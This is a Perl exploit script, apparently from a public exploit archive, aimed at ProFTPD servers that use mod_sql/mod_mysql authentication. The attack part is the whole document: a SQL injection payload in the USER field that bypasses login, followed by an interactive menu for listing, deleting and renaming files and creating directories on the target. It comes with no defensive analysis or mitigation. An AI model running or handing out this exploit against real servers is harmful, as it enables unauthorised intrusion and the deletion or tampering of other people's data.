ProFTPD mod_sql用户名SQL注入漏洞

# Exploited By AlpHaNiX # HomePage NullArea.Net # Greetz For Zigma-Djekmani-r1z use Net::FTP; if (@ARGV < 1 ) { print"\n\n\n[+] Usage : ". "\n\n[+] ./exploit.pl ftp.target.net \n\n" ; exit();} $host = $ARGV[0]; system("cls") ; print "----------------------------------------------------------\n". "[+] ProFTPd with mod_mysql Authentication Bypass Exploit \n". "[+] Credits Go For gat3way For Finding The Bug !\n". "[+] Exploited By AlpHaNiX \n". "[+] NullArea.Net\n". "----------------------------------------------------------\n"."\n[!] Attacking $host ..." ; $user = "USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --"; $pass = '1'; $ftp = Net::FTP->new("$host", Debug => 0) or die "[!] Cannot connect to $host"; $ftp->login("$user","$pass") or die "\n\n[!] Couldn't ByPass The authentication ! ", $ftp->message; print "\n[*] Connected To $host"; print "\n[!] Please Choose A Command To Execute On $host :\n" ; print "\n\n\n[1] Show Files\n" ; print "[2] Delete File\n"; print "[3] Rename File or Dir\n"; print "[4] Create A Directory\n"; print "[5] Exit\n"; print "Enter Number Of Command Here => " ; my $command = <STDIN> ; chomp $command ; if ($command==1){&Show} if ($command==2){&Delete} if ($command==3){&rename} if ($command==4){&create_dir} if ($command==5){&EXIT} if ($command =! 1||2||3||4||5) {print "\n[!] Not Valid Choise ! Closing..." ;exit()} sub Show { print "\n\n\n[!] Please Specify a directory\n"; my $dir = <STDIN> ; chomp $dir ; $ftp->cwd($dir) or $newerr=1; push @ERRORS, "Can't cd $!\n" if $newerr; myerr() if $newerr; $ftp->quit if $newerr; @files=$ftp->dir or $newerr=1; push @ERRORS, "Can't get file list $!\n" if $newerr; myerr() if $newerr; print "Got file list\n"; foreach(@files) { print "$_\n"; } exit(); } sub Delete { print "\n\n\n[!] Please Specify a File To Delete\n"; my $file = <STDIN> ; chomp $file ; $ftp->delete($file) or die "\n[!] Error while Deleting $file => " , $ftp->message ; print "\n[!] $file Deleted !"; } sub rename { print "\n\n\n[!] Please Specify a File To Rename\n"; my $file = <STDIN> ; chomp $file ; print "\n[!] Please Specify a New Name For $file\n"; my $name = <STDIN> ; chomp $name ; $ftp->rename($file,$name) or die "\n[!] Error while Renaming $file => " , $ftp->message ; print "\n[!] $file Renamed to $name !"; } sub create_dir { print "\n\n\n[!] Please Specify a Directory Name To create\n"; my $dir = <STDIN> ; chomp $dir ; $ftp->mkdir($dir) or die "\n[!] Error while creating $dir => " , $ftp->message ; print "\n[!] $dir Created !"; } sub EXIT { system("cls"); $ftp->quit; exit(); }